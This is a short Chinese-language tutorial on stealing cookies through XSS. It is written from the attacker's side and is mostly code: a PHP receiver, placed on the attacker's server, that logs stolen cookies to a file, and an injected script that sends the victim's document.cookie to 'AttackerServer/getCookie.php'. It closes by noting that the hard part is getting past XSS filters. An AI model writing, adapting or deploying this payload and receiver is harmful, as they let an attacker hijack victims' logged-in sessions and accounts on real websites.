简单的cookie盗取

此文需要有一定的javascript\html\php方面的只是作为基础

直接上代码：

#用于抓取盗窃来的cookie的php文件，此文件需置于攻击者的服务器上，这里包含了两种写法：Method1和Method2
#保存为getCookie.php
<?php  

#Method 1

// $info=getenv("QUERY_STRING");
// if ($info)
// {
// 	# code...
// 	$info=urldecode($info);
// 	$fp=fopen("info.txt","a");
// 	fwrite($fp,$info."\n\n\n\n");
// 	fclose($fp);
// }

#Method2

$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log); 

?>

接下来需要再被攻击者的服务器页面上注入一段javascript代码，用于将被攻击者的cookie传送到我们的服务器上

<script>
document.location='http://AttackerServer/getCookie.php?cookie='+document.cookie;
</script>

当被攻击者的浏览器加载了被恶意注入的代码后，就会向攻击者的服务器发送自己的cookie，从而达到了盗取用户cookie的目的

*注：当你浏览某个需要登陆的页面（比如论坛）时，在登录之后，把地址栏清空后在地址栏里写入javascript:alert(document.cookie)。你就会看到这个登陆页面在你计算机里保存的cookie。

解析：

可以看到，两种方法写的盗取cookie的攻击者脚本并不难，仅仅只做了一个接收参数，保存为文件的工作。

cookie盗取真正难的部分应该还是在于，如何向被攻击者的页面注入这段javascript脚本。这就要借助XSS跨站脚本攻击的一些手法，在对方管理员做了严格限制的情况下，需要想办法绕过XSS的过滤，才能使我们的cookie盗取奏效。